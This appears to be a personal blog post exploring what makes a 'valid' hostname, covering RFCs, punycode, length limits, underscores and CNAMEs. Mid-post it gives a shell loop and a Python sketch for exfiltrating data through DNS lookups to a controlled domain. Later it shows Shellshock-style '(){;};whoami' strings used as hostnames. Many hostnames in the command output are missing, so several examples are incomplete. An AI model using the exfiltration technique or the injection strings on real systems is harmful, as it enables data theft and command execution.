Signs of Triviality

Opinions, mostly my own, on the importance of being and other things.
[homepage]  [blog]  []  [@jschauma]  [RSS]

What's in a hostname?

October 18, 2021

Hello, my hostname is... undefined. I think a lot of people on the internet are wrong. In particular (well, this time, anyway), about what is and isn't valid to use in a "hostname". Yes, yes, xkcd 386, but still, humor me, will ya?

Just about everywhere you look, people will tell you that a valid hostname consists only of the characters a-z, numbers, and hyphens ("-"), but that it can't start or end with a hyphen. So you start putting together a regular expression along the lines of:


Now, as the famous saying goes, you have (at least) two problems:

DNS names are case-insensitive, so and wWw.NeTmEiStEr.OrG are equivalent:

$ host is an alias for has address has IPv6 address 2001:470:30:84:e276:63ff:fe72:3900
$ host wWw.NeTmEiStEr.OrG is an alias for has address has IPv6 address 2001:470:30:84:e276:63ff:fe72:3900

And in my zone file, I can create labels using upper or lower case characters, and a lookup for either will yield all matching results:

$ grep ^[bB]
b       IN      A
b       IN      AAAA    2001:db8:b::1
B       IN      A
B       IN      AAAA    2001:db8:b::2
$ host has address has address has IPv6 address 2001:db8:b::2 has IPv6 address 2001:db8:b::1
$ host has address has address has IPv6 address 2001:db8:b::2 has IPv6 address 2001:db8:b::1

(This, by the way, is why you need to normalize e.g., hostnames in client certificates, SNIs, or Host: headers, especially when using those in an authorization context.)
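A minimal sketch of that normalization step, in Python. The function names are made up for illustration, and the sketch assumes the name is already in its ASCII (A-label) form; it only folds the ASCII letters, since that is all the DNS treats as case-insensitive, and drops a single trailing root dot:

```python
import string

# Only A-Z folds to a-z; other characters are left untouched on purpose.
_ASCII_LOWER = str.maketrans(string.ascii_uppercase, string.ascii_lowercase)


def normalize_hostname(name: str) -> str:
    """Return a comparison-friendly form of a DNS name (hypothetical helper)."""
    if name.endswith("."):
        name = name[:-1]  # "example.org." and "example.org" name the same node
    return name.translate(_ASCII_LOWER)


def same_host(a: str, b: str) -> bool:
    """Compare two names the way the DNS would: ASCII case-insensitively."""
    return normalize_hostname(a) == normalize_hostname(b)
```

Comparing the normalized forms, rather than the raw strings from a certificate or a Host: header, is what keeps "B" and "b" from being treated as two different principals.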

But ok, adding A-Z to the regex isn't hard. But we also have to account for special cases involving hyphens. Common wisdom tells us we can't have a hostname start or end with a hyphen, but what about multiple successive hyphens? Let's give it a try:

$ host has address has IPv6 address 2001:db8:53::7

Hey, that works. But... wait a second, RFC5891 (2010), which adds support for Internationalized Domain Names (IDNs) in the DNS notes:

The Unicode string MUST NOT contain "--" (two consecutive hyphens) in the third and fourth character positions and MUST NOT start or end with a "-" (hyphen).

Remember IDNs? Those are used in the DNS to represent names using non-ASCII alphabets, but are actually written into the DNS using punycode. Punycode uses the ASCII Compatible Encoding (ACE) prefix "xn--", which... makes things really messy:

"ä" is an IDN with punycode representation "". Your browser or an HTTP client like e.g., curl(1) may automatically translate ä to xn--4ca for you, so will not actually issue a DNS lookup for "ä", but for "". Likewise for, say, 💩 / xn--ls8h.

But not all Unicode Code Points are necessarily allowed in IDNs (see RFC5892); ä (00E4) is allowed, 💩 (1F4A9) is not. Never mind that despite it violating RFC5892, the domain 💩.la exists, got a TLS certificate from Let's Encrypt, and can be reached via your browser; it merely shows that registrars and clients do not necessarily or consistently implement this check.
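To make the translation step concrete, here is a rough Python sketch using the standard library's "punycode" codec. The helper names are hypothetical, and the sketch deliberately performs none of the RFC5892 code point checks, which is roughly what a lenient client does:

```python
def to_a_label(u_label: str) -> str:
    """Convert one label to its ACE form; pure-ASCII labels pass through."""
    if u_label.isascii():
        return u_label
    # The codec implements only the Punycode algorithm; no validity checks.
    return "xn--" + u_label.encode("punycode").decode("ascii")


def has_reserved_hyphens(label: str) -> bool:
    """True if the label has "--" in the third and fourth positions."""
    return label[2:4] == "--"


if __name__ == "__main__":
    for label in ("ä", "💩", "www"):
        print(label, "->", to_a_label(label))
```

Because the encoder does not care whether a code point is permitted, it will happily produce an A-label for 💩 as well; rejecting that is a separate policy decision that each client or registrar has to implement.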

Now your browser is likely to take "ä", translate it to "" and then perform a DNS lookup, but a command-line lookup would try "ä" and fail:

$ host has address has IPv6 address 2001:db8:53::7
$ host ä
host ä not found: 3(NXDOMAIN)
$ host has address has IPv6 address 2001:db8:53::6
$ host 💩
Host 💩 not found: 3(NXDOMAIN)

curl(1), for example, may behave differently depending on the version or how it was built:

# successful conversion to
$ curl -v -I http://ä 
*   Trying


$ curl -I http://ä.valid.dns.netmeister.or
curl: (3) Failed to convert ä to ACE; could not convert string to UTF-8

As we observe, on successful conversion of the IDN into punycode we get an "xn--"-prefixed DNS label name, which is why we don't want any names with two hyphens in the third and fourth position. bind9 let us do that anyway, but to generate a valid label, we might create names like this:

$ host has address has IPv6 address 2001:db8:1:2:3:4:5:678

Oooookay then. That's pretty long. Can you just... do that? Is there no limitation on the length of a hostname?

There is. But it's complicated: When matching "hostnames", we're often more interested in fully-qualified domain names, which consist of multiple DNS labels. Each of those has a length restriction, while we also have a total maximum length of the FQDN. Specifically, the DNS limitations are spelled out in RFC1035 from 1987:

Various objects and parameters in the DNS have size
limits.  They are listed below.  Some could be easily
changed, others are more fundamental.

labels          63 octets or less
names           255 octets or less

So in addition to the initial examples of "valid hostnames", the following would also need to be matched correctly:

# A single label cannot be longer than 63 octets:
$ host has address has IPv6 address 2001:db8:dead:f1ea::1

# But you can have many labels so long as the FQDN is <= 255 octets:
$ host
has address
has IPv6 address 2001:db8:0:1:2:3:4:5
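The two limits interact in a way that is easy to get wrong: the 255 octets are counted in wire format, where every label carries a one-octet length prefix and the name ends with the zero-length root label. A small Python sketch of the arithmetic (helper names are my own; it assumes plain dot-separated text and does not handle escaped dots inside labels):

```python
MAX_LABEL_OCTETS = 63
MAX_NAME_OCTETS = 255


def split_labels(name: str) -> list[bytes]:
    """Split a textual name into labels, ignoring one trailing root dot."""
    if name.endswith("."):
        name = name[:-1]
    return [label.encode("utf-8") for label in name.split(".")]


def wire_length(name: str) -> int:
    """Octets on the wire: a length byte per label plus the root label."""
    return sum(1 + len(label) for label in split_labels(name)) + 1


def fits_dns_limits(name: str) -> bool:
    """Check the RFC1035 size limits for labels and for the whole name."""
    labels = split_labels(name)
    if any(not 1 <= len(label) <= MAX_LABEL_OCTETS for label in labels):
        return False
    return wire_length(name) <= MAX_NAME_OCTETS
```

Under this accounting, the longest name you can write without the trailing dot is 253 characters, e.g. three 63-octet labels followed by one 61-octet label.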

With up to 63 octets per label and 253 characters in the textual FQDN (the 255-octet limit includes the per-label length bytes and the root label), you can see how you can then use DNS lookups for data exfiltration:

$ for label in $(base64 <payload | fold -w 200 | sed -e 's/.\{63\}/&./g'); do
        dig txt $label.yourdomain
done

On the authoritative DNS server you control, simply reconstruct the original data from the DNS lookups. Nice. But back to the question of what makes a "valid hostname"...
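For the curious, the chunking and the reconstruction can be sketched in a few lines of Python. Note that this is not the shell loop above: I swapped base64 for base32 here, on the assumption that you want an alphabet that survives the DNS's case-insensitivity and contains no "+", "/" or "=". The function names and the "exfil.example" suffix in the usage note are made up:

```python
import base64


def encode_to_names(payload: bytes, suffix: str) -> list[str]:
    """Spread payload over query names of <= 253 chars with <= 63-char labels."""
    text = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    budget = 253 - len(suffix) - 1        # room left of ".<suffix>"
    labels_per_name = (budget + 1) // 64  # each label costs 63 chars + a dot
    if labels_per_name < 1:
        raise ValueError("suffix leaves no room for data labels")
    step = labels_per_name * 63
    names = []
    for start in range(0, len(text), step):
        chunk = text[start:start + step]
        labels = [chunk[i:i + 63] for i in range(0, len(chunk), 63)]
        names.append(".".join(labels) + "." + suffix)
    return names


def decode_from_names(names: list[str], suffix: str) -> bytes:
    """Reverse encode_to_names(); names must be in their original order."""
    text = "".join(n[: -len(suffix) - 1].replace(".", "") for n in names)
    text = text.upper()
    text += "=" * (-len(text) % 8)        # restore the stripped padding
    return base64.b32decode(text)
```

Something like encode_to_names(data, "exfil.example") yields the names to look up; a real transfer would also need sequence numbers, since queries can arrive out of order or be retried.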

Trying to encode all of the above so far in a regular expression becomes silly quickly, and is thus left as an exercise for those who enjoy copying code from Stackoverflow without fully understanding what it does. But ok, let's stick with the basic rule of only allowing [a-z0-9-], meaning we're talking about an individual DNS label. Where did people pick up the rules about only allowing [a-z0-9-]?

The canonical citation for this restriction remains RFC952, which dates back to 1985 (and thus predates the DNS itself). In fact, RFC952 is entitled "DOD INTERNET HOST TABLE SPECIFICATION", providing a lexical grammar for entries of type NET, GATEWAY, HOST, and DOMAIN:

<hname> ::= <name>*["."<name>]
<name>  ::= <let>[*[<let-or-digit-or-hyphen>]<let-or-digit>]
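Translated literally, that grammar for a single <name> becomes a short regular expression. The Python sketch below covers only the grammar as quoted (not any other restrictions RFC952 may impose), plus a second pattern for the RFC1123 relaxation that permits a leading digit, capped at the 63-octet label limit from RFC1035. The names are my own, and as the rest of this post argues, matching these patterns says "conservative hostname label", not "valid DNS label":

```python
import re

# <let>[*[<let-or-digit-or-hyphen>]<let-or-digit>]
RFC952_NAME = re.compile(r"[A-Za-z](?:[A-Za-z0-9-]*[A-Za-z0-9])?")

# Same shape, but the first character may be a digit; at most 63 characters.
RFC1123_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def is_rfc952_name(label: str) -> bool:
    """True if the whole label matches the RFC952 <name> production."""
    return RFC952_NAME.fullmatch(label) is not None


def is_rfc1123_label(label: str) -> bool:
    """True if the label follows the relaxed letter-digit-hyphen rule."""
    return RFC1123_LABEL.fullmatch(label) is not None
```

Using fullmatch() rather than match() or search() matters here: without anchoring both ends, a trailing hyphen or an embedded newline slips through.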


The domain system allows a label to contain any 8-bit character. Although the domain system has no restrictions, other protocols such as SMTP do have name restrictions. Because of other protocol restrictions, only the following characters are recommended for use in a host name (besides the dot separator):

        "A-Z", "a-z", "0-9", dash and underscore

The DNS "DOMAIN NAMES - IMPLEMENTATION AND SPECIFICATION" RFC1035 (1987) states that "when creating a new host name, the old rules for HOSTS.TXT should be followed.", and RFC1123 (1989) updates RFC952 to allow hostnames to start with a letter or a digit, but that's about it. RFC1912 (1996) similarly suggests as much:

Allowable characters in a label for a host name are only ASCII letters, digits, and the `-' character. Labels may not be all numbers, but may have a leading digit (e.g., Labels must end and begin only with a letter or digit. [...] The presence of underscores in a label is allowed in [RFC 1033], except [RFC 1033] is informational only and was not defining a standard.

Ergo: hostnames MUST match only [a-z0-9-], right? Well, fun fact: RFC1912 is also only informational, but ok, then RFC952/RFC1123 still holds. But then why do we even have so many questions about what makes a valid hostname?

Now that appears to have its origin in Microsoft Windows's use of NetBIOS, which defines "NetBIOS computer names" in RFC1001 as 16 bytes (though Microsoft only allows 15 bytes, using the last byte to encode the device's functionality), and which does allow, for example, spaces as well as the underscore ("_") (see e.g., AD naming conventions). Now even in the days of Windows NT people apparently understood that spaces in names can complicate things, so replacing spaces with underscores appears to have been a popular approach: "MY COMPUTER" becomes "MY_COMPUTER".

But while a NetBIOS "computer name" is not a hostname, you do need one of those to communicate with other hosts on the internet (i.e., outside of NetBIOS), and so you end up with people trying to add their NetBIOS "computer names" into the DNS, have their software or name server reject the name due to an invalid character, and then go and ask on Stackoverflow what the set of valid characters for a hostname is. Which is how we got here.

But... is an underscore an invalid character in a hostname? It's pretty clear from, say, SRV or TLSA records and the widespread use of DKIM that the DNS has no problem with them:

$ dig +short tlsa
3 1 1 2D2379261544C9841025CE4F728F7D4D5A00E9B0B1EF2B1E2EEBBED7 B1843543
$ dig +short txt
YiLFpZ0VGvz1ufZLVWKuOF1iKJOF/rDjzehyNK2CkJscPzcuMV6zMQyxiEOOPl4Pkugd4G27G4klqLK9TZ   \

In fact, many modern nameservers implement DNS Query Name Minimisation (RFC7816) using exactly an underscore as the left-most label, so clearly the underscore is a valid character -- for a DNS label, at least.

So what's the set of valid characters for a DNS label that's not a hostname? Aside from the "informational" RFCs noted above, RFC2181 provided a few important "Clarifications to the DNS Specification" back in 1997:

Occasionally it is assumed that the Domain Name System serves only the purpose of mapping Internet host names to data, and mapping Internet addresses to host names. This is not correct, the DNS is a general (if somewhat limited) hierarchical database, and can store almost any kind of data, for almost any purpose.

The DNS itself places only one restriction on the particular labels that can be used to identify resource records. That one restriction relates to the length of the label and the full name. The length of any one label is limited to between 1 and 63 octets. A full domain name is limited to 255 octets (including the separators). [...] Those restrictions aside, any binary string whatever can be used as the label of any resource record. Similarly, any binary string can serve as the value of any record that includes a domain name as some or all of its value (SOA, NS, MX, PTR, CNAME, and any others that may be added).

Oh, look at that: "any binary string whatever can be used as the label of any resource record." That includes the underscore. But even though a DNS label (and RDATA, incidentally) can contain just about anything, the above history has led to DNS implementations applying different rules to labels that function as "hostnames" -- specifically, labels for resource records of type A, AAAA, and MX, as well as for RDATA of types NS, SOA, MX, and SRV (at least):

$ grep -n ^_
53: _       IN      TXT     "no query minimization here"
70: _       IN      A
$ named-checkzone bad owner name (check-names)
zone loaded serial

Note that named-checkzone did not complain about the TXT record on line 53, and so that is indeed a valid DNS label:

$ dig +short txt
"no query minimization here"

In other words, we can use all sorts of characters for records of other types, notably including CNAME records:

$ host is an alias for is an alias for has address has IPv6 address 2001:470:30:84:e276:63ff:fe72:3900

Now this makes things interesting, because virtually everybody considers a CNAME to be a "hostname", and FQDNs that are CNAMEs end up in all sorts of places where we assume they are hostnames. But note also that RFC2181 stresses:

Implementations of the DNS protocols must not place any restrictions on the labels that can be used. In particular, DNS servers must not refuse to serve a zone because it contains labels that might not be acceptable to some DNS client programs. A DNS server may be configurable to issue warnings when loading, or even to refuse to load, a primary zone containing labels that might be considered questionable, however this should not happen by default.

And so -- ignoring the discussion of what should or shouldn't be a "default" -- we can instruct e.g., bind9 to simply not complain about so-called "invalid" names, since we have already established that, outside of the length restriction, there really is no such thing. And then:

# A "hostname" must not start with a hyphen:
$ dig +short aaaa -q ""

# ...nor end with a hyphen:
$ dig +short aaaa

# MX records should not allow special characters like '@'
$ dig +short mx

# You can't quote the ., but you sure can make it look like you can:
$ host "'.'"
'.' has address
'.' has IPv6 address 2001:db8:fa4e::8

# In fact, all bets are off:
$ dig +short "¯\_(ツ)_/¯"
$ dig +short aaaa "¯\_(ツ)_/¯"

With check-names disabled, we can then also create a label with a literal non-punycode IDN / emoji, thereby allowing tools like host(1) and dig(1) to work:

$ host ä                    
\195\131\194\ has address
\195\131\194\ has IPv6 address 2001:db8:fa4e::11
$ host 💩                   
\195\176\194\159\194\146\194\ has address
\195\176\194\159\194\146\194\ has IPv6 address 2001:db8:fa4e::10

This still feels like cheating, though, because we had to explicitly disable check-names in our bind9 configuration file. But remember that anything that's "invalid" for "hostnames" (as in A and AAAA records) still is valid for CNAME records. So all of the following shenanigans will work and are entirely "valid":

$ host ''\ is an alias for is an alias for has address has IPv6 address 2001:470:30:84:e276:63ff:fe72:3900
$ host "¯\_(ツ)_/¯"
\195\130\194\175_\(\195\163\194\131\194\132\)_/\195\130\194\ is an alias for has address has IPv6 address 2001:db8:1::1
$ host  '$'
\$ is an alias for has address has IPv6 address 2001:db8:1::1
$  host '(){;};'
\(\){\;}\; is an alias for has address has IPv6 address 2001:db8:1::1

"But those aren't hostnames!", you say. Which... is true. But they're used as hostnames and used in a hostname context for all intents and purposes. Which of course makes things like (){;};whoami particularly dangerous -- remember Shellshock? Setting a "hostname" via DHCP was exactly one such scenario. And what exactly is a "hostname" supposed to be, anyway?

A "hostname" can mean many different things (as noted in RFC7719). It may refer to a DNS label of an A or AAAA record, it may refer to a complete FQDN, or it may be "the left-most label of a FQDN". And this distinction between "the left-most component of a FQDN" and a FQDN is important even if you stick to all common definitions of "validity". For example, consider the hostname 0xcafe, which clearly matches ^[a-zA-Z0-9-]+$:

$ grep domain /etc/resolv.conf
domain # save ourselves some typing
$ host 0xcafe has address has IPv6 address 2001:db8:cafe:cafe:cafe:cafe:cafe:c0fe
$ ping 0xcafe
PING 0xcafe ( 56 data bytes

Since 0xcafe is not a FQDN, our host(1) command will append But ping(1) says "Hey, that's just a hex number, let me pretend it's an IP address and ping that instead.". Yay!
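To see which address that is, here is a small Python sketch of the single-number case only. It is my assumption that ping(1) gets this behaviour from an inet_aton(3)-style parser; the helper name is hypothetical, and the octal and dotted multi-part forms such parsers also accept are left out:

```python
import ipaddress
from typing import Optional


def hex_name_as_ipv4(text: str) -> Optional[str]:
    """Return the dotted quad a lone 0x... number denotes, or None."""
    if not text.lower().startswith("0x"):
        return None
    try:
        value = int(text, 16)  # int() accepts the "0x" prefix for base 16
    except ValueError:
        return None            # e.g. "0xcafe.example" is not a bare number
    if value > 0xFFFFFFFF:
        return None            # does not fit into 32 bits
    return str(ipaddress.IPv4Address(value))


if __name__ == "__main__":
    print(hex_name_as_ipv4("0xcafe"))
```

The value 0xcafe is simply read as a 32-bit integer, so the two low-order bytes become the last two octets of the address.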

But... isn't a "hostname" in the end whatever the hostname(1) command returns (depending on your Unix flavor using either the -s flag or as a default)? And shouldn't that define what is and isn't "valid"?

Well, guess what: the hostname(1) command itself may not enforce any restrictions on what you set your system's hostname to. Even if your hostname(1) does, your sethostname(2) probably does not:

# NetBSD:
$ sudo hostname _invalid
$ hostname _invalid
$ sudo hostname " "
$ hostname
$ sudo hostname '(){;};whoami'
$ hostname

# Linux
$ sudo hostname _invalid
hostname: the specified hostname is invalid
$ sudo sysctl -w kernel.hostname=_invalid
kernel.hostname = _invalid
$ hostname
$ echo '(){;};whoami' | sudo tee /proc/sys/kernel/hostname 
$ hostname

Oh, and one last thing: * is a valid character for a DNS label, and so indeed a valid hostname (per RFC2181), but in bind9 it also functions as a wildcard, matching any names that you do not have explicitly set in the zone. And that matches * itself:

$ host $(tr -dc '[:print:]' </dev/urandom | head -c 12)
[?3ft0ds&] has address
[?3ft0ds&] has IPv6 address 2001:db8::c2de:2d22:5ca1:2727
$ host *
* has address
* has IPv6 address 2001:db8::c2de:2d22:5ca1:2727

So with that, I can get myself a wildcard TLS certificate for * and serve that from http://* (although it will depend on your client whether or not it correctly interprets this hostname):

$ curl -v -I https://*
*   Trying 2001:470:30:84:e276:63ff:fe72:3900:4443...
* Connected to * (2001:470:30:84:e276:63ff:fe72:3900) port 4443 (#0)
* SSL connection using TLSv1.2 / AES256-GCM-SHA384
* Server certificate:
*  subject: CN=*
*  subjectAltName: host "*" matched cert's "*"
*  SSL certificate verify ok.
> HEAD / HTTP/1.1
> Host: *
< HTTP/1.1 200 OK

Safari has no problem visiting that site, but Firefox and Chrome both treat https://* as an invalid URL, so default to searching the internet instead. Web servers similarly may not correctly handle a Host: * header: Apache appears to not extract the host from the header and will throw a 400 Bad Request, while e.g., bozohttpd has no problem serving the request:

Screenshot of Safari connecting to

So... what does valid mean in the context of "hostnames"? It seems like we haven't made much progress since the beginning of this blog post. I guess the best we can do is draw the distinction between RFC-valid and "probably not a good idea":

  • ^[a-zA-Z0-9-]+$ is not correct to match "valid" hostnames
  • "_" is a valid character in a hostname, but so are !@#$%^&*(){};.

    It still isn't a good idea to use those characters in a DNS label for an A or AAAA record, and in fact many libraries and applications will reject them.
  • As we've seen, you can stuff anything into the DNS and be technically correct, but that doesn't help you in reality.
  • However, you should never assume that whatever comes back from a DNS lookup or what might show up in a CNAME or anywhere else matches whatever you think is "valid".
  • You can spend a surprising amount of time chasing RFCs and finding out more than you ever thought you'd need to know about something as trivial as "hostnames".

The Internet is a Playground, the DNS a never-ending source of entertainment and astonishment, and hostnames... largely undefined.

"'Tis but thy name that is my enemy;
Thou art thyself, though not a Host.
What's Host? It is nor port, nor service,
Nor stack, nor app, nor any other part
Belonging to a system. O, be some other name!
What's in a name? That which we call a site
By any other name would fail as quick;
" -- DevOps Juliet

